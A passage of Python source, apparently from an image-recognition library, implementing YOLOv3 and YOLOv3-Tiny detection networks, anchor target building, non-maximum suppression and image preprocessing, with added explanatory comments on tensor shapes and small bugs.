[], []\r\n gain = torch.ones(7, device=device) \r\n \r\n ai = torch.arange(na, device=device).float().view(na, 1).repeat(1, nt)\r\n \r\n targets = torch.cat((targets.repeat(na, 1, 1), ai[:, :, None]), 2)\r\n\r\n g = 0.5\r\n off = torch.tensor([\r\n [0, 0], [1, 0], [0, 1],\r\n [-1, 0], [0, -1]\r\n ], device=device).float() * g \r\n\r\n for i, yolo_layer in enumerate(loss_layers):\r\n \r\n anchors = yolo_layer.anchors / yolo_layer.stride\r\n \r\n \r\n gain[2:6] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] \r\n \r\n t = targets * gain\r\n \r\n if nt:\r\n \r\n r = t[:, :, 4:6] / anchors[:, None]\r\n \r\n j = torch.max(r, 1.0 / r).max(2)[0] < 4.0 \r\n \r\n \r\n \r\n t = t[j]\r\n\r\n \r\n gxy = t[:, 2:4] \r\n gxi = gain[[2,3]] - gxy\r\n j, k = ((gxy % 1 < g) & (gxy > 1)).T\r\n l, m = ((gxi % 1 < g) & (gxi > 1)).T\r\n j = torch.stack((torch.ones_like(j), j, k, l, m))\r\n t = t.repeat((5, 1, 1))[j]\r\n offsets = (torch.zeros_like(gxy)[None] + off[:, None])[j]\r\n else:\r\n t = targets[0]\r\n offsets = 0\r\n\r\n \r\n b, c = t[:, :2].long().T\r\n \r\n \r\n gxy = t[:, 2:4] \r\n gwh = t[:, 4:6] \r\n \r\n gij = (gxy - offsets).long()\r\n \r\n gi, gj = gij.T \r\n\r\n \r\n a = t[:, 6].long()\r\n \r\n \r\n indices.append((b, a, gj.clamp_(0, int(gain[3] - 1)), gi.clamp_(0, int(gain[2] - 1))))\r\n \r\n tbox.append(torch.cat((gxy - gij, gwh), 1)) \r\n \r\n anch.append(anchors[a])\r\n \r\n tcls.append(c)\r\n\r\n return tcls, tbox, indices, anch\r\n\r\ndef noop(x):\r\n return x\r\n\r\n\r\nclass DetectionLayer(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n anchor_masks: Tuple[int, int, int],\r\n layer: int,\r\n num_classes: int = 80,\r\n device: str = \"cpu\"\r\n ):\r\n super().__init__()\r\n self.height = 416\r\n self.width = 416\r\n self.num_classes = num_classes\r\n self.ignore_thresh = 0.7\r\n self.truth_thresh = 1\r\n self.rescore = 1\r\n self.device = device\r\n self.anchors = self.__get_anchors(anchors, anchor_masks)\r\n self.layer = layer\r\n self.layer_width = None\r\n self.layer_height = None\r\n self.layer_output = None\r\n self.pred = None\r\n self.stride = None\r\n self.grid = None\r\n self.anchor_grid = None\r\n\r\n def __get_anchors(\r\n self, anchors: Union[List[int], Tuple[int, ...]],\r\n anchor_masks: Tuple[int, int, int]\r\n ) -> torch.Tensor:\r\n a = [(anchors[i], anchors[i + 1]) for i in range(0, len(anchors), 2)]\r\n return torch.tensor([a[i] for i in anchor_masks]).to(self.device)\r\n\r\n def forward(self, x: torch.Tensor):\r\n self.layer_height, self.layer_width = x.shape[2], x.shape[3]\r\n self.stride = self.height // self.layer_height\r\n if self.training:\r\n batch_size = x.shape[0]\r\n grid_size = x.shape[2]\r\n bbox_attrs = 5 + self.num_classes\r\n num_anchors = len(self.anchors)\r\n\r\n \r\n self.layer_output = x.detach()\r\n self.pred = x.view(batch_size, num_anchors, bbox_attrs, grid_size, grid_size).permute(0, 1, 3, 4,\r\n 2).contiguous()\r\n\r\n self.layer_output = self.layer_output.view(batch_size, bbox_attrs * num_anchors, grid_size * grid_size)\r\n self.layer_output = self.layer_output.transpose(1, 2).contiguous()\r\n self.layer_output = self.layer_output.view(batch_size, grid_size * grid_size * num_anchors, bbox_attrs)\r\n\r\n else:\r\n \r\n \r\n self.layer_output = transform_prediction(\r\n x.data, self.width, self.anchors, self.num_classes,\r\n self.device\r\n )\r\n return self.layer_output\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n\r\n def __init__(self, in_f: int, out_f: int, kernel_size: int = 3,\r\n stride: int = 1, 
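# The anchor filter in build_targets above keeps a target/anchor pair only if
# max(ratio, 1/ratio) < 4 in both dimensions: a 40x20 target matches a 30x25
# anchor (ratios 1.33, 1.25) but not a 5x120 one (ratios 8.0, 6.0).
# Standalone check of the same metric:
import torch
target_wh = torch.tensor([[40.0, 20.0]])
anchors = torch.tensor([[30.0, 25.0], [5.0, 120.0]])
r = target_wh[:, None] / anchors[None]        # (1, 2, 2) ratio tensor
keep = torch.max(r, 1.0 / r).max(2)[0] < 4.0
print(keep)  # tensor([[ True, False]])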
use_batch_norm: bool = True,\r\n activation: str = \"leaky\"):\r\n super().__init__()\r\n self.conv = nn.Conv2d(\r\n in_f, out_f, stride=stride, kernel_size=kernel_size,\r\n padding=kernel_size // 2,\r\n bias=False if use_batch_norm else True\r\n )\r\n self.batch_norm = nn.BatchNorm2d(out_f) if use_batch_norm else noop\r\n self.leaky_relu = nn.LeakyReLU(0.1, inplace=True) if activation == \"leaky\" else noop\r\n\r\n def forward(self, x: torch.Tensor):\r\n return self.leaky_relu(self.batch_norm(self.conv(x)))\r\n\r\n\r\nclass YoloV3(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n num_classes: int = 80,\r\n device: str = \"cpu\"):\r\n super().__init__()\r\n\r\n \r\n self.conv1 = ConvLayer(3, 32)\r\n self.conv2 = ConvLayer(32, 64, stride=2)\r\n self.conv3 = ConvLayer(64, 32, 1, 1)\r\n self.conv4 = ConvLayer(32, 64)\r\n \r\n self.conv5 = ConvLayer(64, 128, stride=2)\r\n self.conv6 = ConvLayer(128, 64, 1, 1)\r\n self.conv7 = ConvLayer(64, 128, stride=1)\r\n \r\n self.conv8 = ConvLayer(128, 64, 1, 1)\r\n self.conv9 = ConvLayer(64, 128, stride=1)\r\n \r\n self.conv10 = ConvLayer(128, 256, stride=2)\r\n self.conv11 = ConvLayer(256, 128, 1, 1)\r\n self.conv12 = ConvLayer(128, 256)\r\n \r\n self.conv13 = ConvLayer(256, 128, 1, 1)\r\n self.conv14 = ConvLayer(128, 256)\r\n \r\n self.conv15 = ConvLayer(256, 128, 1, 1)\r\n self.conv16 = ConvLayer(128, 256)\r\n \r\n self.conv17 = ConvLayer(256, 128, 1, 1)\r\n self.conv18 = ConvLayer(128, 256)\r\n \r\n self.conv19 = ConvLayer(256, 128, 1, 1)\r\n self.conv20 = ConvLayer(128, 256)\r\n \r\n self.conv21 = ConvLayer(256, 128, 1, 1)\r\n self.conv22 = ConvLayer(128, 256)\r\n \r\n self.conv23 = ConvLayer(256, 128, 1, 1)\r\n self.conv24 = ConvLayer(128, 256)\r\n \r\n self.conv25 = ConvLayer(256, 128, 1, 1)\r\n self.conv26 = ConvLayer(128, 256)\r\n \r\n self.conv27 = ConvLayer(256, 512, stride=2)\r\n self.conv28 = ConvLayer(512, 256, 1, 1)\r\n self.conv29 = ConvLayer(256, 512)\r\n \r\n self.conv30 = ConvLayer(512, 256, 1, 1)\r\n self.conv31 = ConvLayer(256, 512)\r\n \r\n self.conv32 = ConvLayer(512, 256, 1, 1)\r\n self.conv33 = ConvLayer(256, 512)\r\n \r\n self.conv34 = ConvLayer(512, 256, 1, 1)\r\n self.conv35 = ConvLayer(256, 512)\r\n \r\n self.conv36 = ConvLayer(512, 256, 1, 1)\r\n self.conv37 = ConvLayer(256, 512)\r\n \r\n self.conv38 = ConvLayer(512, 256, 1, 1)\r\n self.conv39 = ConvLayer(256, 512)\r\n \r\n self.conv40 = ConvLayer(512, 256, 1, 1)\r\n self.conv41 = ConvLayer(256, 512)\r\n \r\n self.conv42 = ConvLayer(512, 256, 1, 1)\r\n self.conv43 = ConvLayer(256, 512)\r\n \r\n self.conv44 = ConvLayer(512, 1024, stride=2)\r\n self.conv45 = ConvLayer(1024, 512, 1, 1)\r\n self.conv46 = ConvLayer(512, 1024)\r\n \r\n self.conv47 = ConvLayer(1024, 512, 1, 1)\r\n self.conv48 = ConvLayer(512, 1024)\r\n \r\n self.conv49 = ConvLayer(1024, 512, 1, 1)\r\n self.conv50 = ConvLayer(512, 1024)\r\n \r\n self.conv51 = ConvLayer(1024, 512, 1, 1)\r\n self.conv52 = ConvLayer(512, 1024)\r\n \r\n self.conv53 = ConvLayer(1024, 512, 1, 1)\r\n self.conv54 = ConvLayer(512, 1024)\r\n self.conv55 = ConvLayer(1024, 512, 1, 1)\r\n self.conv56 = ConvLayer(512, 1024)\r\n self.conv57 = ConvLayer(1024, 512, 1, 1)\r\n self.conv58 = ConvLayer(512, 1024)\r\n self.conv59 = ConvLayer(\r\n 1024, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo1 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(6, 7, 8), device=device, layer=1\r\n )\r\n\r\n \r\n self.conv60 = 
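# --- Editor's note: ConvLayer pads with kernel_size // 2, so a 3x3 conv is
# "same" padding and only the stride changes the resolution. The five
# stride-2 convolutions above (conv2, conv5, conv10, conv27, conv44) halve
# the feature map each time, which is the whole downsampling arithmetic:
size = 416
for _ in range(5):            # conv2, conv5, conv10, conv27, conv44
    size //= 2
print(size)                   # 13 -> grid of the coarsest YOLO head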
ConvLayer(512, 256, 1, 1)\r\n self.upsample1 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n self.conv61 = ConvLayer(768, 256, 1, 1)\r\n self.conv62 = ConvLayer(256, 512)\r\n self.conv63 = ConvLayer(512, 256, 1, 1)\r\n self.conv64 = ConvLayer(256, 512)\r\n self.conv65 = ConvLayer(512, 256, 1, 1)\r\n self.conv66 = ConvLayer(256, 512)\r\n self.conv67 = ConvLayer(\r\n 512, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo2 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(3, 4, 5), device=device, layer=2\r\n )\r\n\r\n \r\n self.conv68 = ConvLayer(256, 128, 1, 1)\r\n self.upsample2 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n\r\n self.conv69 = ConvLayer(384, 128, 1, 1)\r\n self.conv70 = ConvLayer(128, 256)\r\n self.conv71 = ConvLayer(256, 128, 1, 1)\r\n self.conv72 = ConvLayer(128, 256)\r\n self.conv73 = ConvLayer(256, 128, 1, 1)\r\n self.conv74 = ConvLayer(128, 256)\r\n self.conv75 = ConvLayer(\r\n 256, (3 * (5 + num_classes)), 1, 1, use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n\r\n \r\n self.yolo3 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(0, 1, 2), device=device, layer=3\r\n )\r\n\r\n def get_loss_layers(self) -> List[torch.Tensor]:\r\n return [self.yolo1, self.yolo2, self.yolo3]\r\n\r\n def __route_layer(self, y1: torch.Tensor, y2: Optional[torch.Tensor] = None):\r\n if isinstance(y2, torch.Tensor):\r\n return torch.cat([y1, y2], 1)\r\n return y1\r\n\r\n def __shortcut_layer(self,\r\n y1: torch.Tensor, y2: torch.Tensor,\r\n activation: str = \"linear\"\r\n ) -> torch.Tensor:\r\n actv = noop if activation == \"linear\" else nn.LeakyReLU(0.1)\r\n return actv(y1 + y2)\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n y = self.conv2(self.conv1(x))\r\n \r\n y = self.conv5(self.__shortcut_layer(self.conv4(self.conv3(y)), y))\r\n y2 = self.conv7(self.conv6(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv9(self.conv8(y))\r\n \r\n y2 = self.conv10(self.__shortcut_layer(y2, y))\r\n y = self.conv12(self.conv11(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv14(self.conv13(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv16(self.conv15(self.__shortcut_layer(y2, y)))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv18(self.conv17(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv20(self.conv19(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv22(self.conv21(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv24(self.conv23(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv26(self.conv25(y2))\r\n \r\n r1 = self.__shortcut_layer(y, y2) \r\n y = self.conv27(r1)\r\n y2 = self.conv29(self.conv28(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv31(self.conv30(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv33(self.conv32(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv35(self.conv34(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv37(self.conv36(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv39(self.conv38(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv41(self.conv40(y))\r\n \r\n y = self.__shortcut_layer(y2, y)\r\n y2 = self.conv43(self.conv42(y))\r\n \r\n r2 = self.__shortcut_layer(y2, y) \r\n y2 = self.conv44(r2)\r\n y = self.conv46(self.conv45(y2))\r\n \r\n y2 = self.__shortcut_layer(y, 
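# --- Editor's sketch: why conv61 expects 768 input channels. A shape-only
# check (torch only): the 13x13x256 head feature is upsampled to 26x26 and
# concatenated with the 26x26x512 backbone route, so 256 + 512 = 768.
import torch
import torch.nn as nn

y = torch.zeros(1, 256, 13, 13)                  # after conv60
r2 = torch.zeros(1, 512, 26, 26)                 # backbone route
up = nn.Upsample(scale_factor=2, mode="nearest")(y)
print(torch.cat([up, r2], dim=1).shape)          # torch.Size([1, 768, 26, 26])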
y2)\r\n y = self.conv48(self.conv47(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv50(self.conv49(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv52(self.conv51(y2))\r\n \r\n y2 = self.__shortcut_layer(y, y2)\r\n y = self.conv54(self.conv53(y2))\r\n r3 = self.conv57(self.conv56(self.conv55(y))) \r\n y = self.conv59(self.conv58(r3))\r\n\r\n \r\n out = self.yolo1(y)\r\n y = self.conv60(self.__route_layer(r3))\r\n y = self.conv62(self.conv61(self.__route_layer(self.upsample1(y), r2)))\r\n r4 = self.conv65(self.conv64(self.conv63(y))) \r\n y = self.conv67(self.conv66(r4))\r\n\r\n \r\n out = torch.cat([out, self.yolo2(y)], dim=1)\r\n y = self.conv68(self.__route_layer(r4))\r\n y = self.conv70(self.conv69(self.__route_layer(self.upsample2(y), r1)))\r\n y = self.conv75(self.conv74(self.conv73(self.conv72(self.conv71(y)))))\r\n\r\n \r\n out = torch.cat([out, self.yolo3(y)], dim=1)\r\n\r\n return out\r\n\r\ndef draw_bbox_and_label(x: torch.Tensor, label: str, img: np.ndarray) -> np.ndarray:\r\n\r\n x1, y1, x2, y2 = tuple(map(int, x))\r\n if x is not None:\r\n img = cv.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\r\n t_size = cv.getTextSize(label, cv.FONT_HERSHEY_PLAIN, 1, 1)[0]\r\n c2 = (x1 + t_size[0] + 3, y1 + t_size[1] + 4)\r\n img = cv.putText(img, label, (x1, y1 + t_size[1] + 4), cv.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 1)\r\n\r\n return img\r\n\r\n\r\ndef letterbox_image(\r\n image: np.ndarray,\r\n inp_dim: Tuple[int, int]) -> np.ndarray:\r\n\r\n img_w, img_h = image.shape[1], image.shape[0] \r\n net_w, net_h = inp_dim \r\n\r\n\r\n scale_factor = min(net_w / img_w, net_h / img_h)\r\n new_w = int(round(img_w * scale_factor))\r\n new_h = int(round(img_h * scale_factor))\r\n\r\n resized_image = cv.resize(image, (new_w, new_h), interpolation=cv.INTER_CUBIC)\r\n canvas = np.full((net_w, net_h, 3), 128)\r\n canvas[(net_h - new_h) // 2: (net_h - new_h) // 2 + new_h, (net_w - new_w) // 2: (net_w - new_w) // 2 + new_w,\r\n :] = resized_image\r\n return canvas\r\n\r\n\r\ndef prepare_image(\r\n image: np.ndarray,\r\n inp_dim: Tuple[int, int]) -> torch.Tensor:\r\n\r\n img = letterbox_image(image, inp_dim)\r\n img = img[:, :, ::-1].transpose((2, 0, 1)).copy()\r\n img = torch.from_numpy(img).float().div(255.0).unsqueeze(0)\r\n return img\r\n\r\n\r\ndef bbox_iou(bbox1: torch.Tensor, bbox2: torch.Tensor, device=\"cpu\"):\r\n\r\n b1_x1, b1_y1, b1_x2, b1_y2 = bbox1[:, 0], bbox1[:, 1], bbox1[:, 2], bbox1[:, 3]\r\n b2_x1, b2_y1, b2_x2, b2_y2 = bbox2[:, 0], bbox2[:, 1], bbox2[:, 2], bbox2[:, 3]\r\n\r\n \r\n inter_rect_x1 = torch.max(b1_x1, b2_x1)\r\n inter_rect_y1 = torch.max(b1_y1, b2_y1)\r\n inter_rect_x2 = torch.min(b1_x2, b2_x2)\r\n inter_rect_y2 = torch.min(b1_y2, b2_y2)\r\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape, device=device)) * \\\r\n torch.max(inter_rect_y2 - inter_rect_y1 + 1, torch.zeros(inter_rect_y2.shape, device=device))\r\n\r\n b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)\r\n b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)\r\n\r\n return inter_area / (b1_area + b2_area - inter_area)\r\n\r\n\r\ndef transform_prediction(\r\n pred: torch.Tensor,\r\n inp_dim: int,\r\n anchors: Union[List[int], Tuple[int, ...], torch.Tensor],\r\n num_classes: int,\r\n device: str = \"cpu\"\r\n) -> torch.Tensor:\r\n batch_size = pred.shape[0]\r\n grid_size = pred.shape[2]\r\n stride = inp_dim // grid_size\r\n bbox_attrs = 5 + num_classes\r\n num_anchors = len(anchors)\r\n\r\n \r\n pred = pred.view(batch_size, bbox_attrs 
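# --- Editor's notes on the helpers above, flagged rather than silently
# changed: (1) in draw_bbox_and_label the `if x is not None` guard comes
# after x has already been unpacked, so it can never protect a None input;
# (2) this second bbox_iou definition shadows the earlier CIoU-capable one
# (same module, same name) and uses the +1-pixel area convention;
# (3) letterbox_image builds its canvas as np.full((net_w, net_h, 3), 128),
# a (width, height) ordering that only works because the input is square,
# and the dtype defaults to float64 rather than uint8.
# Minimal check of the aspect-preserving scale factor (pure python):
img_w, img_h, net = 640, 480, 416
scale = min(net / img_w, net / img_h)                      # 0.65
new_w, new_h = int(round(img_w * scale)), int(round(img_h * scale))
print(new_w, new_h, (net - new_h) // 2)                    # 416 312 52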
* num_anchors, grid_size * grid_size)\r\n pred = pred.transpose(1, 2).contiguous()\r\n pred = pred.view(batch_size, grid_size * grid_size * num_anchors, bbox_attrs)\r\n\r\n \r\n \r\n \r\n \r\n anchors = [(a[0] / stride, a[1] / stride) for a in anchors]\r\n\r\n \r\n pred[:, :, 0] = torch.sigmoid(pred[:, :, 0])\r\n pred[:, :, 1] = torch.sigmoid(pred[:, :, 1])\r\n pred[:, :, 4] = torch.sigmoid(pred[:, :, 4])\r\n\r\n \r\n grid = torch.arange(grid_size, dtype=torch.float)\r\n grid = np.arange(grid_size)\r\n x_o, y_o = np.meshgrid(grid, grid)\r\n \r\n\r\n x_offset = torch.FloatTensor(x_o).view(-1, 1).to(device)\r\n y_offset = torch.FloatTensor(y_o).view(-1, 1).to(device)\r\n \r\n \r\n\r\n x_y_offset = torch.cat([x_offset, y_offset], dim=1).repeat(1, num_anchors).view(-1, 2).unsqueeze(0)\r\n pred[:, :, :2] += x_y_offset\r\n\r\n \r\n anchors = torch.FloatTensor(anchors).to(device)\r\n anchors = anchors.repeat(grid_size * grid_size, 1).unsqueeze(0)\r\n pred[:, :, 2:4] = torch.exp(pred[:, :, 2:4]) * anchors\r\n\r\n \r\n pred[:, :, 5:5 + num_classes] = torch.sigmoid(pred[:, :, 5:5 + num_classes])\r\n\r\n \r\n pred[:, :, :4] *= stride\r\n\r\n return pred\r\n\r\n\r\ndef get_predictions(\r\n pred: torch.Tensor,\r\n num_classes: int,\r\n objectness_confidence: float = 0.5,\r\n nms_confidence_level: float = 0.4,\r\n device: str = \"cpu\") -> Union[torch.Tensor, int]:\r\n\r\n conf_mask = (pred[:, :, 4] > objectness_confidence).float().unsqueeze(2)\r\n pred = pred * conf_mask\r\n\r\n bbox_corner = pred.new(pred.shape)\r\n bbox_corner[:, :, 0] = (pred[:, :, 0] - (pred[:, :, 2] / 2)) \r\n bbox_corner[:, :, 1] = (pred[:, :, 1] - (pred[:, :, 3] / 2)) \r\n bbox_corner[:, :, 2] = (pred[:, :, 0] + (pred[:, :, 2] / 2)) \r\n bbox_corner[:, :, 3] = (pred[:, :, 1] + (pred[:, :, 3] / 2)) \r\n pred[:, :, :4] = bbox_corner[:, :, :4]\r\n\r\n output = None\r\n for idx in range(pred.shape[0]):\r\n img_pred = pred[idx]\r\n\r\n max_conf, max_idx = torch.max(img_pred[:, 5:5 + num_classes], 1)\r\n max_conf = max_conf.float().unsqueeze(1).to(device)\r\n max_idx = max_idx.float().unsqueeze(1).to(device)\r\n img_pred = torch.cat([img_pred[:, :5], max_conf, max_idx], 1)\r\n\r\n non_zero_idx = torch.nonzero(img_pred[:, 4]).to(device)\r\n img_pred = img_pred[non_zero_idx.squeeze(), :].view(-1, 7).to(device)\r\n if not img_pred.shape[0]:\r\n continue\r\n\r\n img_classes = torch.unique(img_pred[:, -1]).to(device)\r\n\r\n for cls in img_classes:\r\n class_mask = img_pred * (img_pred[:, -1] == cls).float().unsqueeze(1)\r\n class_mask_idx = torch.nonzero(class_mask[:, -2]).squeeze()\r\n img_pred_class = img_pred[class_mask_idx].view(-1, 7)\r\n\r\n \r\n conf_sort_idx = torch.sort(img_pred_class[:, 4], descending=True)[1]\r\n img_pred_class = img_pred_class[conf_sort_idx]\r\n\r\n for d_idx in range(img_pred_class.shape[0]):\r\n try:\r\n ious = bbox_iou(img_pred_class[d_idx].unsqueeze(0), img_pred_class[d_idx + 1:], device=device)\r\n except (IndexError, ValueError):\r\n break\r\n\r\n \r\n iou_mask = (ious < nms_confidence_level).float().unsqueeze(1)\r\n img_pred_class[d_idx + 1:] *= iou_mask\r\n non_zero_idx = torch.nonzero(img_pred_class[:, 4]).squeeze()\r\n img_pred_class = img_pred_class[non_zero_idx].view(-1, 7)\r\n\r\n batch_idx = img_pred_class.new(img_pred_class.shape[0], 1).fill_(idx)\r\n if isinstance(output, torch.Tensor):\r\n out = torch.cat([batch_idx, img_pred_class], 1)\r\n output = torch.cat([output, out])\r\n else:\r\n output = torch.cat([batch_idx, img_pred_class], 1)\r\n return output\r\n\r\nclass 
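# --- Editor's sketch: the greedy NMS step in get_predictions above, as a
# self-contained toy run (torch only): keep the highest-confidence box, drop
# remaining boxes whose IoU with it exceeds the threshold, repeat per class.
# (Side note: in transform_prediction, `grid = torch.arange(...)` is dead
# code; it is immediately overwritten by the numpy meshgrid version.)
import torch

def greedy_nms(boxes, scores, iou_thr=0.4):
    # boxes: (N, 4) as x1, y1, x2, y2; returns the indices that survive
    order = scores.argsort(descending=True)
    keep = []
    while order.numel():
        i = order[0]
        keep.append(i.item())
        if order.numel() == 1:
            break
        rest = boxes[order[1:]]
        x1 = torch.max(boxes[i, 0], rest[:, 0])
        y1 = torch.max(boxes[i, 1], rest[:, 1])
        x2 = torch.min(boxes[i, 2], rest[:, 2])
        y2 = torch.min(boxes[i, 3], rest[:, 3])
        inter = (x2 - x1).clamp(0) * (y2 - y1).clamp(0)
        area_i = (boxes[i, 2] - boxes[i, 0]) * (boxes[i, 3] - boxes[i, 1])
        area_r = (rest[:, 2] - rest[:, 0]) * (rest[:, 3] - rest[:, 1])
        order = order[1:][inter / (area_i + area_r - inter) <= iou_thr]
    return keep

boxes = torch.tensor([[0., 0., 10., 10.], [1., 1., 11., 11.], [20., 20., 30., 30.]])
scores = torch.tensor([0.9, 0.8, 0.7])
print(greedy_nms(boxes, scores))   # [0, 2]: the overlapping box 1 is dropped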
YoloV3Tiny(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n num_classes: int = 80,\r\n device: str = \"cpu\"\r\n ):\r\n super().__init__()\r\n\r\n \r\n self.conv1 = ConvLayer(3, 16)\r\n self.maxpool1 = nn.MaxPool2d(2, 2)\r\n self.conv2 = ConvLayer(16, 32)\r\n self.maxpool2 = nn.MaxPool2d(2, 2)\r\n self.conv3 = ConvLayer(32, 64)\r\n self.maxpool3 = nn.MaxPool2d(2, 2)\r\n self.conv4 = ConvLayer(64, 128)\r\n self.maxpool4 = nn.MaxPool2d(2, 2)\r\n self.conv5 = ConvLayer(128, 256)\r\n self.maxpool5 = nn.MaxPool2d(2, 2)\r\n self.conv6 = ConvLayer(256, 512)\r\n self.zeropad = nn.ZeroPad2d((0, 1, 0, 1))\r\n self.maxpool6 = nn.MaxPool2d(2, 1)\r\n self.conv7 = ConvLayer(512, 1024)\r\n self.conv8 = ConvLayer(1024, 256, 1, 1)\r\n self.conv9 = ConvLayer(256, 512)\r\n self.conv10 = ConvLayer(\r\n 512, (3 * (5 + num_classes)), 1, 1,\r\n use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n self.yolo1 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(3, 4, 5), device=device, layer=1\r\n )\r\n \r\n self.conv11 = ConvLayer(256, 128, 1, 1)\r\n self.upsample1 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n self.conv12 = ConvLayer(384, 256)\r\n self.conv13 = ConvLayer(\r\n 256, (3 * (5 + num_classes)), 1, 1,\r\n use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n self.yolo2 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(0, 1, 2), device=device, layer=2\r\n )\r\n\r\n def get_loss_layers(self) -> List[torch.Tensor]:\r\n return [self.yolo1, self.yolo2]\r\n\r\n def __route_layer(self, y1: torch.Tensor, y2: Optional[torch.Tensor] = None) -> torch.Tensor:\r\n if isinstance(y2, torch.Tensor):\r\n return torch.cat([y1, y2], 1)\r\n return y1\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n y = self.maxpool2(self.conv2(self.maxpool1(self.conv1(x))))\r\n y = self.maxpool4(self.conv4(self.maxpool3(self.conv3(y))))\r\n r1 = self.conv5(y) \r\n y = self.zeropad(self.conv6(self.maxpool5(r1)))\r\n y = self.conv7(self.maxpool6(y))\r\n r2 = self.conv8(y) \r\n y = self.conv10(self.conv9(r2))\r\n\r\n \r\n out = self.yolo1(y)\r\n y = self.conv11(self.__route_layer(r2))\r\n y = self.__route_layer(self.upsample1(y), r1)\r\n y = self.conv13(self.conv12(y))\r\n\r\n \r\n out = torch.cat([out, self.yolo2(y)], 1)\r\n\r\n return out\r\nwarnings.filterwarnings(\"once\", category=ResourceWarning)\r\n\r\n\r\nclass ResNet50Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.resnet50(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif 
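# --- Editor's sketch: YoloV3Tiny spatial bookkeeping. The five stride-2
# maxpools take 416 down to 13; maxpool6 has stride 1, so the
# ZeroPad2d((0, 1, 0, 1)) + MaxPool2d(2, 1) pair keeps the 13x13 size
# (shape-only check, torch only):
import torch
import torch.nn as nn

x = torch.zeros(1, 512, 13, 13)
y = nn.MaxPool2d(2, 1)(nn.ZeroPad2d((0, 1, 0, 1))(x))
print(y.shape)    # torch.Size([1, 512, 13, 13])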
os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = 